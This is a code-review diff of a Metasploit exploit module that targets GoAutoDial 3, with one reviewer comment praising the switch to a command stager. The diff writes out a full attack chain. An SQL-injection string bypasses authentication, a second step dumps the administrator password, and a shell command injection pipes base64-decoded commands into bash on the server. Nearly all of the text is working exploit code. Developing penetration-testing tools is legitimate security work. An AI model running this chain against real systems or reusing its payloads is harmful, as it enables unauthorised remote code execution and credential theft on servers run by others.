modules/exploits/linux/http/goautodial_3_rce_command_injection.rb

```diff
@@ -42,100 +50,114 @@ def initialize(info={})
-      'headers'   => {
+      'uri'     => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', Rex::Text.uri_encode("' OR active='Y")),
+      'cookie'  => @cookie,
+      'headers' => {
         'User-Agent' => 'Mozilla/5.0',
-        'Accept-Encoding' => 'identity',
-        'Cookie' => cookies
+        'Accept-Encoding' => 'identity'
       }
     })
   end
 
   #
-  # Run the actual exploit
+  # Run the command stager
   #
-  def execute_command()
+  def execute_command(cmd, opts = {})
 
-    encoded = Rex::Text.encode_base64("#{payload.encoded}")
-    params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
+    params = "|echo -n #{Rex::Text.encode_base64(cmd)} |base64 --decode|bash"
     uri = target_uri.path
 
     send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
-      'headers'   => {
+      'uri'     => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', Rex::Text.uri_encode(params)),
+      'cookie'  => @cookie,
+      'headers' => {
         'User-Agent' => 'Mozilla/5.0',
-        'Accept-Encoding' => 'identity',
-        'Cookie' => @cookie
+        'Accept-Encoding' => 'identity'
       }
     })
   end
 
+  def exploit
+    print_status("#{peer} - Trying SQL injection...")
+    res = sqli_auth_bypass
 
-  def exploit()
-    print_status("#{rhost}:#{rport} - Trying SQL injection...")
-    res1 = sqli_auth_bypass()
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed')
+    end
 
-    if res1 && res1.code == 200
-      print_good('Authentication Bypass (SQLi) was successful')
+    if res.code == 200 && res.get_cookies.include?('go_session')
+      print_good("#{peer} - Authentication Bypass (SQLi) was successful")
     else
-      print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
+      fail_with(Failure::NotVulnerable, "Run 'check' command to identify whether the auth bypass has been fixed")
     end
 
-    @cookie = res1.get_cookies
-    print_status("#{rhost}:#{rport} - Dumping admin password...")
-    res = sqli_admin_pass(@cookie)
+    @cookie = res.get_cookies
+    print_status("#{peer} - Dumping admin password...")
+    res = sqli_admin_pass
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed')
+    end
 
-    if res
-      print_good(res.body)
+    # Example response: admin|goautodial|Admin|||Y
+    if res.body.include?('|')
+      print_good("#{peer} - Found credentials: #{res.body}")
     else
-      print_error('Error: No creds returned, possible mitigations are in place.')
+      fail_with(Failure::NotVulnerable, 'No creds returned, possible mitigations are in place.')
     end
-    print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
 
-    execute_command()
+    print_status("#{peer} - Sending payload...")
+    execute_cmdstager(:linemax => 800)
```

Comment:
Command stager for the win. `:linemax => 800` is on the conservative side. Keeping in mind that the payload is later base64 encoded before submission.